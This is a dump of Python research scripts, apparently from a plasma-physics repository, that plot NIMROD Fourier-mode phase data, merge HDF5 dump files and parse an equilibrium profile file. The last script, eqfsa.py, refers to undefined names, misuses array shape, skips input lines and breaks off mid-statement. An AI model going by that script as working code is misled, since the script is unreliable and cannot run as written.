B\\right)_{2/1}$\"\n titledict['etajpert']=r\"$\\nabla \\times \\left(\\eta \\tilde J\\right)_{2/1}$\"\n titledict['divpie']=r\"$\\nabla \\times \\left(\\frac{1}{ne}\\nabla \\cdot \\pi_e\\right)_{2/1}$\"\n\n phase_21=interp1d(self.rhon,self.bmn_phase[0,3,:], kind='linear')(self.get_rho_q(-2))\n print(phase_21)\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n tc=colorlist[0%len(colorlist)]\n plt.title(r\"$\\psi_{2/1}$ amplitude\")\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|\\psi_{2/1}|$ [mWb/s]',fontsize=fontsize)\n ax.plot(self.rhon,self.bmn_amp[0,3,:]*1000, color=tc)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.show()\n\n if key is None:\n for ikey in self.interp_dict:\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n #'amp'\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(titledict.get(ikey,ikey))\n plt.plot(self.rhon,self.this_amp[0,3,:])\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n 
plt.ylabel(r'$|F_{m/n}|$ [Wb/s]',fontsize=fontsize)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.tight_layout()\n plt.show()\n else:\n pass\n return None\n\n\n def plot_fsa_phase(self, key=None, **kwargs):\n qlist=[-1.5,-2,-3,-4]\n fontsize=18\n colorlist = list(mcolors.TABLEAU_COLORS)\n titledict={}\n titledict={}\n titledict['veqbeq']=r\"$\\nabla \\times \\left(V_0 \\times B_0\\right)_{2/1}$\"\n titledict['vpbeq']=r\"$\\nabla \\times \\left(\\tilde V \\times B_0\\right)_{2/1}$\"\n titledict['veqbp']=r\"$\\nabla \\times \\left(V_0 \\times \\tilde B\\right)_{2/1}$\"\n titledict['vpbp']=r\"$\\nabla \\times \\left(\\tilde V \\times \\tilde B\\right)_{2/1}$\"\n titledict['etajpert']=r\"$\\nabla \\times \\left(\\eta \\tilde J\\right)_{2/1}$\"\n titledict['divpie']=r\"$\\nabla \\times \\left(\\frac{1}{ne}\\nabla \\cdot \\pi_e\\right)_{2/1}$\"\n sumlist=['etajpert','divpie']\n phase_21=interp1d(self.rhon,self.bmn_phase[0,3,:], kind='linear')(self.get_rho_q(-2))\n binphase,boutphase=self.phase_shift2(self.bcmn[0,3,:],self.bsmn[0,3,:],phase_21)\n print(phase_21)\n\n if \"time\" in kwargs:\n tmp=kwargs[\"time\"]\n time_str = f\" at {tmp*1000:.1f} ms\"\n else:\n time_str=\"\"\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n tc=colorlist[0%len(colorlist)]\n plt.title(r\"$\\psi_{m/n}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|\\psi_{m/1}|$ [mWb]',fontsize=fontsize)\n thisamp=np.sqrt(np.square(self.bcmn)+np.square(self.bsmn))\n ax.plot(self.rhon,thisamp[0,4,:]*1000,color=colorlist[4],label=r\"$m=-1$\")\n ax.plot(self.rhon,thisamp[0,3,:]*1000,color=colorlist[1],label=r\"$m=-2$\")\n ax.plot(self.rhon,thisamp[0,2,:]*1000,color=colorlist[2],label=r\"$m=-3$\")\n ax.plot(self.rhon,thisamp[0,1,:]*1000,color=colorlist[3],label=r\"$m=-4$\")\n ax.axhline(0,ls='-',color='k')\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.1f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.legend(ncol=2,fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.show()\n\n vxb_inphase = np.zeros(self.bmn_amp.shape)\n vxb_outphase = np.zeros(self.bmn_amp.shape)\n for ikey in ['vpbeq','veqbp','vpbp']: #veqbeq is not calculated\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n this_in,this_out=self.phase_shift2(this_cosmn,this_sinmn,phase_21)\n vxb_inphase+=this_in\n vxb_outphase+=this_out\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"$\\nabla \\times \\left(\\vec v \\times \\vec b\\right)_{m/n}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'In phase component [Wb/s]',fontsize=fontsize)\n ax.plot(self.rhon,vxb_inphase[0,4,:],color=colorlist[4],label=r\"$m=-1$\")\n ax.plot(self.rhon,vxb_inphase[0,3,:],color=colorlist[1],label=r\"$m=-2$\")\n ax.plot(self.rhon,vxb_inphase[0,2,:],color=colorlist[2],label=r\"$m=-3$\")\n ax.plot(self.rhon,vxb_inphase[0,1,:],color=colorlist[3],label=r\"$m=-4$\")\n ax.axhline(0,ls='-',color='k')\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.1f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n 
plt.legend(ncol=2,fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.show()\n\n reconnect_inphase = np.zeros(self.bmn_amp.shape)\n reconnect_outphase = np.zeros(self.bmn_amp.shape)\n for ikey in ['etajpert','divpie']:\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n this_in,this_out=self.phase_shift2(this_cosmn,this_sinmn,phase_21)\n reconnect_inphase+=this_in\n reconnect_outphase+=this_out\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"-$\\nabla \\times \\left(\\eta J + \\frac{1}{ne}\\nabla \\cdot \\pi_e\\right)_{m/n}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'In phase component [Wb/s]',fontsize=fontsize)\n ax.plot(self.rhon,reconnect_inphase[0,4,:],color=colorlist[4],label=r\"$m=-1$\")\n ax.plot(self.rhon,reconnect_inphase[0,3,:],color=colorlist[1],label=r\"$m=-2$\")\n ax.plot(self.rhon,reconnect_inphase[0,2,:],color=colorlist[2],label=r\"$m=-3$\")\n ax.plot(self.rhon,reconnect_inphase[0,1,:],color=colorlist[3],label=r\"$m=-4$\")\n ax.axhline(0,ls='-',color='k')\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.1f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.legend(ncol=2,fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.show()\n\n rhomin=0.5\n rhomax=0.8\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"-$\\nabla \\times \\left(\\eta J + \\frac{1}{ne}\\nabla \\cdot \\pi_e\\right)_{m/n}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'In phase component [Wb/s]',fontsize=fontsize)\n range=np.where((self.rhon>rhomin) & (self.rhon<rhomax))[0]\n ax.plot(self.rhon[range],reconnect_inphase[0,4,range],color=colorlist[4],label=r\"$m=-1$\")\n ax.plot(self.rhon[range],reconnect_inphase[0,3,range],color=colorlist[1],label=r\"$m=-2$\")\n ax.plot(self.rhon[range],reconnect_inphase[0,2,range],color=colorlist[2],label=r\"$m=-3$\")\n ax.plot(self.rhon[range],reconnect_inphase[0,1,range],color=colorlist[3],label=r\"$m=-4$\")\n ax.axhline(0,ls='-',color='k')\n\n irho = self.get_rho_q(-2)\n qlbl = f\"q = {-2:.1f}\"\n tc=colorlist[1]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n\n plt.legend(ncol=2,fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.xlim(rhomin,rhomax)\n plt.tight_layout()\n plt.show()\n\n\n\n eta_cosmn,eta_sinmn,eta_amp,eta_phase=self.interp_dict['etajpert']\n eta_in,eta_out=self.phase_shift2(eta_cosmn,eta_sinmn,phase_21)\n divpie_cosmn,divpie_sinmn,divpie_amp,divpie_phase=self.interp_dict['divpie']\n divpie_in,divpie_out=self.phase_shift2(divpie_cosmn,divpie_sinmn,phase_21)\n\n\n fig= plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"$\\delta \\psi_{-2/1}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'Re $\\delta \\psi$ [Wb/s]',fontsize=fontsize)\n irho = self.get_rho_q(-2)\n qlbl = f\"q = {-2:.1f}\"\n tc=colorlist[1]\n ax.axvline(irho,ls=':',color=tc,label=\"q=-2.0\")\n# plt.text(irho*.985,-4,'q=-2',rotation=90,color=tc,fontsize=fontsize)\n range=np.where((self.rhon>rhomin) & (self.rhon<rhomax))[0]\n ax.plot(self.rhon[range],reconnect_inphase[0,3,range],label=r\"$\\delta 
\\psi_{rec}$\",color=colorlist[0])\n ax.plot(self.rhon[range],eta_in[0,3,range],label=r\"$\\delta \\psi_{\\eta} $\",color=colorlist[2])\n ax.plot(self.rhon[range],divpie_in[0,3,range],label=r\"$\\delta \\psi_{\\pi_e}$\",color=colorlist[3])\n ax.axhline(0,ls='-',color='k')\n\n\n\n plt.legend(fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.xlim(rhomin,rhomax)\n plt.tight_layout()\n plt.show()\n\n #rhomin=0.60\n #rhomax=0.85\n fig= plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"$\\delta \\psi_{-2/1}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'Re $\\delta \\psi$ [Wb/s]',fontsize=fontsize)\n irho = self.get_rho_q(-2)\n qlbl = f\"q = {-2:.1f}\"\n tc=colorlist[1]\n ax.axvline(irho,ls=':',color=tc,label=\"q=-2.0\")\n range=np.where((self.rhon>rhomin) & (self.rhon<rhomax))[0]\n ax.plot(self.rhon[range],reconnect_inphase[0,3,range],label=r\"$\\delta \\psi_{rec}$\",color=colorlist[0])\n ax.plot(self.rhon[range],eta_in[0,3,range],label=r\"$\\delta \\psi_{\\eta} $\",color=colorlist[2])\n ax.plot(self.rhon[range],divpie_in[0,3,range],label=r\"$\\delta \\psi_{\\pi_e}$\",color=colorlist[3])\n ax.plot(self.rhon[range],vxb_inphase[0,3,range],label=r\"$\\delta \\psi_{VB}$\",color=colorlist[4])\n ax.axhline(0,ls='-',color='k')\n\n\n\n plt.legend(fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n #rhomin=0.60\n #rhomax=0.8\n fig= plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"$\\delta \\psi_{-2/1}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'Re $\\delta \\psi$ [Wb/s]',fontsize=fontsize)\n irho = self.get_rho_q(-2)\n qlbl = f\"q = {-2:.1f}\"\n tc=colorlist[1]\n ax.axvline(irho,ls=':',color=tc,label=\"q=-2.0\")\n range=np.where((self.rhon>rhomin) & (self.rhon<rhomax))[0]\n ax.plot(self.rhon[range],reconnect_inphase[0,3,range],label=r\"$\\delta \\psi_{rec}$\",color=colorlist[0])\n ax.plot(self.rhon[range],eta_in[0,3,range],label=r\"$\\delta \\psi_{\\eta} $\",color=colorlist[2])\n ax.plot(self.rhon[range],divpie_in[0,3,range],label=r\"$\\delta \\psi_{\\pi_e}$\",color=colorlist[3])\n ax.plot(self.rhon[range],vxb_inphase[0,3,range],label=r\"$\\delta \\psi_{VB}$\",color=colorlist[4])\n ax.axhline(0,ls='-',color='k')\n plt.legend(fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.ylim(-3,3)\n plt.tight_layout()\n plt.show()\n\n\n\n return None\n\n def plot_fsa_phase_old(self, key=None, **kwargs):\n qlist=[-1.5, -2,-3,-4]\n fontsize=18\n colorlist = list(mcolors.TABLEAU_COLORS)\n titledict={}\n titledict={}\n titledict['veqbeq']=r\"$\\nabla \\times \\left(V_0 \\times B_0\\right)_{2/1}$\"\n titledict['vpbeq']=r\"$\\nabla \\times \\left(\\tilde V \\times B_0\\right)_{2/1}$\"\n titledict['veqbp']=r\"$\\nabla \\times \\left(V_0 \\times \\tilde B\\right)_{2/1}$\"\n titledict['vpbp']=r\"$\\nabla \\times \\left(\\tilde V \\times \\tilde B\\right)_{2/1}$\"\n titledict['etajpert']=r\"$\\nabla \\times \\left(\\eta \\tilde J\\right)_{2/1}$\"\n titledict['divpie']=r\"$\\nabla \\times \\left(\\frac{1}{ne}\\nabla \\cdot \\pi_e\\right)_{2/1}$\"\n sumlist=['etajpert','divpie']\n phase_21=interp1d(self.rhon,self.bmn_phase[0,3,:], kind='linear')(self.get_rho_q(-2))\n 
binphase,boutphase=self.phase_shift2(self.bcmn[0,3,:],self.bsmn[0,3,:],phase_21)\n print(phase_21)\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n tc=colorlist[0%len(colorlist)]\n plt.title(r\"$\\psi_{2/1}$\")\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|\\psi_{2/1}|$ [mWb]',fontsize=fontsize)\n #ax.plot(self.rhon,self.bmn_amp[0,0,:]*1000,label='amp 0')\n #ax.plot(self.rhon,self.bmn_amp[0,1,:]*1000,label='amp 1')\n #ax.plot(self.rhon,self.bmn_amp[0,2,:]*1000,label='amp 2')\n ax.scatter(self.dvar_dict['rhon'],self.raw_bmn_amp[0,3,:]*1000,label='amp 3')\n plt.show()\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n tc=colorlist[0%len(colorlist)]\n plt.title(r\"$\\psi_{2/1}$\")\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|\\psi_{2/1}|$ [mWb]',fontsize=fontsize)\n #ax.plot(self.rhon,self.bmn_amp[0,0,:]*1000,label='amp 0')\n #ax.plot(self.rhon,self.bmn_amp[0,1,:]*1000,label='amp 1')\n #ax.plot(self.rhon,self.bmn_amp[0,2,:]*1000,label='amp 2')\n ax.plot(self.rhon,self.bmn_amp[0,3,:]*1000,label='amp 3')\n #ax.plot(self.rhon,self.bmn_amp[0,4,:]*1000,label='amp 4')\n #ax.plot(self.rhon,self.bmn_amp[0,5,:]*1000,label='amp 5')\n #ax.plot(self.rhon,self.bmn_amp[0,6,:]*1000,label='amp 6')\n #ax.plot(self.rhon,self.bmn_amp[0,7,:]*1000,label='amp 7')\n #ax.plot(self.rhon,self.bmn_amp[0,8,:]*1000,label='amp 8')\n #ax.plot(self.rhon,self.bmn_amp[0,9,:]*1000,label='amp 9')\n\n ax.plot(self.rhon,binphase*1000,label='in phase')\n ax.plot(self.rhon,boutphase*1000,label='90 out of phase')\n plt.legend()\n ax.axhline(0,ls='-',color='k')\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.show()\n\n in_sum = np.zeros(self.bmn_amp.shape)\n out_sum = np.zeros(self.bmn_amp.shape)\n if key is None:\n for ikey in self.interp_dict:\n print(ikey)\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n this_in,this_out=self.phase_shift2(this_cosmn,this_sinmn,phase_21)\n if ikey in sumlist:\n in_sum+=this_in\n out_sum+=this_out\n #amp\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(titledict.get(ikey,ikey))\n plt.plot(self.rhon,this_amp[0,0,:],label='amp')\n plt.plot(self.rhon,this_in[0,0,:],label='in phase')\n plt.plot(self.rhon,this_out[0,0,:], label='90 out of phase')\n plt.plot(self.rhon,this_amp[0,1,:],label='amp')\n plt.plot(self.rhon,this_in[0,1,:],label='in phase')\n plt.plot(self.rhon,this_out[0,1,:], label='90 out of phase')\n plt.plot(self.rhon,this_amp[0,2,:],label='amp')\n plt.plot(self.rhon,this_in[0,2,:],label='in phase')\n plt.plot(self.rhon,this_out[0,2,:], label='90 out of phase')\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|F_{m/n}|$ [Wb/s]',fontsize=fontsize)\n ax.axhline(0,ls='-',color='k')\n plt.legend()\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n ikey='divpie'\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n this_in,this_out=self.phase_shift2(this_cosmn,this_sinmn,phase_21)\n plt.title(titledict.get(ikey,ikey))\n plt.plot(self.rhon,this_amp[0,3,:],label='amp')\n plt.plot(self.rhon,this_in[0,3,:],label='in phase')\n plt.plot(self.rhon,this_out[0,3,:], label='90 out of 
phase')\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|F_{m/n}|$ [Wb/s]',fontsize=fontsize)\n ax.axhline(0,ls='-',color='k')\n plt.ylim(-50,50)\n plt.legend()\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n ikey='etajpert'\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n this_in,this_out=self.phase_shift2(this_cosmn,this_sinmn,phase_21)\n plt.title(titledict.get(ikey,ikey))\n plt.plot(self.rhon,this_amp[0,3,:],label='amp')\n plt.plot(self.rhon,this_in[0,3,:],label='in phase')\n plt.plot(self.rhon,this_out[0,3,:], label='90 out of phase')\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|F_{m/n}|$ [Wb/s]',fontsize=fontsize)\n ax.axhline(0,ls='-',color='k')\n plt.ylim(-50,50)\n plt.legend()\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.tight_layout()\n plt.show()\n\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"$\\nabla \\times \\left(\\eta \\tilde j + \\frac{1}{ne}\\nabla \\cdot \\Pi_e\\right)$\" )\n plt.plot(self.rhon,np.sqrt(np.square(in_sum[0,3,:])+np.square(out_sum[0,3,:])),label='amp')\n plt.plot(self.rhon,in_sum[0,3,:],label='in phase')\n plt.plot(self.rhon,out_sum[0,3,:],label='90 out of phase')\n ax.axhline(0,ls='-',color='k')\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|F_{m/n}|$ [Wb/s]',fontsize=fontsize)\n plt.ylim(-50,50)\n plt.legend()\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.tight_layout()\n plt.show()\n\n return None\n" }, { "alpha_fraction": 0.5817040801048279, "alphanum_fraction": 0.6111513376235962, "avg_line_length": 34.7068977355957, "blob_id": "1bdf09c1f5de2d9dd9ec56c8f102ade543834045", "content_id": "1e6ff8c278e24600bd7c48d8be03a46d9860dc8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4143, "license_type": "no_license", "max_line_length": 213, "num_lines": 116, "path": "/combineDump/combineMultipleDump.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n#\n# Input files:\n# firstDump - hdf5 dump file with equilibrium and first nk perturbation\n# secondDump - hdf5 dump file with last nk perturbation\n# Ouput file:\n# finalDump -hdf5 dump file that has combines the perturbed fourier nmodes\n# from each dump file\n# I assume that the is no overlap in keff\nimport os\nimport h5py\nfrom itertools import product\nimport numpy as np\nimport sys\nhomeDir = os.environ['HOME']\n\n#begin user inputs\n\nbasePath = homeDir +'/SCRATCH/166439/03300_q104_reorder_combine/S7Pr1e2/'\n\ndumpList=[]\nfor n in range(11):\n tempFile = 'n'+str(n)+'/dumpglln'+str(n)+'.h5'\n dumpList.append(tempFile)\n\n#dumpList = ['n0/dumpglln0.h5','n1/dumpglln1.h5','n2/dumpglln2.h5','n3/dumpglln3.h5','n4/dumpglln4.h5','n5/dumpglln5.h5','n6/dumpglln6.h5','n7/dumpglln7.h5','n8/dumpglln8.h5','n9/dumpglln9.h5','n10/dumpglln10.h5']\n\nfinalDump = basePath+'n0-10/dumpgll_lphi5.h5'\nnewStep=0\nnewTime=0.0\n\n#end of inputs\nveList = [ 'bq' , 'diff', 'jq', 
'nq', 'peq', 'prq', 'rz', 'vq', 'psi_eq']\nvvList = [ 'imbe', 'imve', 'rebe', 'reve']\n\nvsList = [ 'imconc', 'imnd', 'impe', 'impr', 'imte', 'imti', \\\n 'reconc', 'rend', 'repe', 'repr', 'rete', 'reti' ]\n\nfileList = []\nnkList = []\nkStart=[]\nnmodes=0\n\nfc = h5py.File(finalDump, 'w') \n\nfor id, dumpFile in enumerate(dumpList):\n fileList.append(h5py.File(basePath+dumpFile, 'r'))\n kStart.append(nmodes)\n thisK=fileList[id]['keff'].size\n nmodes+=thisK\n nkList.append(thisK)\n\n\n# reset time and step\nfileList[0].copy(fileList[0]['dumpTime'], fc)\nfc['dumpTime'].attrs.modify('vsStep',newStep)\nfc['dumpTime'].attrs.modify('vsTime',newTime)\n\nnewKeff = np.zeros(nmodes)\nfor id in range(len(fileList)):\n for ii in range(nkList[id]):\n newKeff[kStart[id]+ii]=fileList[id]['keff'][ii]\nfc.create_dataset('keff', data=newKeff)\nfc.copy(fileList[0]['seams'],fc)\nfor aname, avalue in fileList[0].attrs.items():\n fc.attrs[aname] = avalue \nfc.attrs['nmodes'] = nmodes\n\nfc.create_group('rblocks')\nfor aname, avalue in fileList[0]['rblocks'].attrs.items():\n fc['rblocks'].attrs[aname] = avalue \nfor re in fileList[0]['rblocks'].keys():\n print('Processing rblock '+re)\n sys.stdout.flush()\n gList=[]\n for id in range(len(fileList)):\n gList.append(fileList[id]['rblocks/'+re])\n gc = fc.create_group('rblocks/'+re)\n for aname, avalue in gList[0].attrs.items():\n gc.attrs[aname] = avalue\n gc.attrs['nfour'] = nmodes\n\n for d1key, d1value in gList[0].items():\n print('Processing '+d1key)\n sys.stdout.flush()\n# copy eq fieds from first dumpfile\n if d1key.startswith(tuple(veList)):\n gc.create_dataset(d1key, data=d1value)\n for aname, avalue in gList[0][d1key].attrs.items():\n gc[d1key].attrs[aname] = avalue\n continue\n if not(d1key.startswith(tuple(vsList+vvList))):\n print(\"Unreconized key: \"+d1key)\n continue\n dsvalue=np.zeros([d1value.shape[0],d1value.shape[1],nmodes])\n dvvalue=np.zeros([d1value.shape[0],d1value.shape[1],3*nmodes])\n for (iv,jv) in product(range(d1value.shape[0]),range(d1value.shape[1])):\n if(d1key.startswith(tuple(vsList))): #scalar field\n for id in range(len(fileList)):\n dvalue=gList[id][d1key][:]\n for nn in range(nkList[id]):\n dsvalue[iv,jv,nn+kStart[id]]=dvalue[iv][jv][nn] \n else: #vector field\n for id in range(len(fileList)):\n dvalue=gList[id][d1key][:]\n for nn in range(nkList[id]):\n dvvalue[iv,jv,3*(nn+kStart[id])]=dvalue[iv][jv][3*nn]\n dvvalue[iv,jv,3*(nn+kStart[id])+1]=dvalue[iv][jv][3*nn+1]\n dvvalue[iv,jv,3*(nn+kStart[id])+2]=dvalue[iv][jv][3*nn+2]\n if(d1key.startswith(tuple(vsList))): \n gc.create_dataset(d1key, data=dsvalue)\n else:\n gc.create_dataset(d1key, data=dvvalue)\n\n for aname, avalue in gList[0][d1key].attrs.items():\n gc[d1key].attrs[aname] = avalue\n\n" }, { "alpha_fraction": 0.5656002163887024, "alphanum_fraction": 0.6097250580787659, "avg_line_length": 33.41414260864258, "blob_id": "1c925293837172ae49f4c37fbad43b9e749f12ab", "content_id": "45fb1062c45914f71c6e823b24904893ec714675", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10221, "license_type": "no_license", "max_line_length": 94, "num_lines": 297, "path": "/surfmnNim/eqfsa.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\n\nplotprofs = True\n\neqfsaFile='/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/orginal_exb/eqfsa.out'\n\nnumfields = 
15\nnumIndex = 0\nmaxFields=0\nlastIndex=0\nthisFields=0\nwith open(eqfsaFile, 'r') as thisFile:\n for thisLine in thisFile:\n thisLine = thisFile.readline()\n thisWords = thisLine.split()\n print(len(thisWords))\n if len(thisWords)==numfields:\n if thisWords[0]=='i': continue\n thisIndex = int(thisWords[0])\n numIndex = max(numIndex, thisIndex)\n if thisIndex == lastIndex:\n thisFields+=1\n print(thisFields,thisIndex)\n else:\n thisFields=1\n print(thisFields,thisIndex)\n lastIndex=thisIndex\n maxFields=max(maxFields,thisFields)\n\nprint(numIndex)\nprint(maxFields)\ndata = np.loadtxt(eqfsaFile,skiprows=6)\nprint (data.shape())\n# Create dictionaries for each file with pertinent information\n# Not necessary for files with time data as the \"1\" dimension\nnpx={}\nnpy={}\n\n# data in binary with number of fields in numfields\nnumfields=15\nindex={}\npsin={}\nvPrime={}\nqg={}\nlam={}\ninvBsqr={}\nnd={}\nti={}\nte={}\npi={}\npe={}\nomega={}\nkpol={}\nDm={}\nDr={}\n\n\n#mu=(m**-1)\n\nfor findex in range(len(files)):\n fieldcount=count_time(files[findex],numfields)\n npx[files[findex]]=fieldcount\n\n index[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n psin[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n vPrime[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n qg[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n lam[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n invBsqr[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n nd[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n ti[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n te[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n pi[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n pe[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n omega[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n kpol[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n Dm[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n Dr[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n\n f=open(files[findex], 'rb')\n\n jj=0\n f.seek(0)\n\n while jj < npx[files[findex]] :\n #first bite is length of a string\n temp=f.read(4)\n blah=struct.unpack(\">l\",temp)\n temp=f.read(numfields*4)\n tf = struct.unpack(\">\"+numfields*'f', temp)\n #last byte is length of string read\n temp=f.read(4)\n index[files[findex]][jj]=tf[0]\n psin[files[findex]][jj]=tf[1]\n vPrime[files[findex]][jj]=tf[2]\n qg[files[findex]][jj]=tf[3]\n lam[files[findex]][jj]=tf[4]\n invBsqr[files[findex]][jj]=tf[5]\n nd[files[findex]][jj]=tf[6]\n ti[files[findex]][jj]=tf[7]\n te[files[findex]][jj]=tf[8] \n pi[files[findex]][jj]=tf[9]\n pe[files[findex]][jj]=tf[10]\n 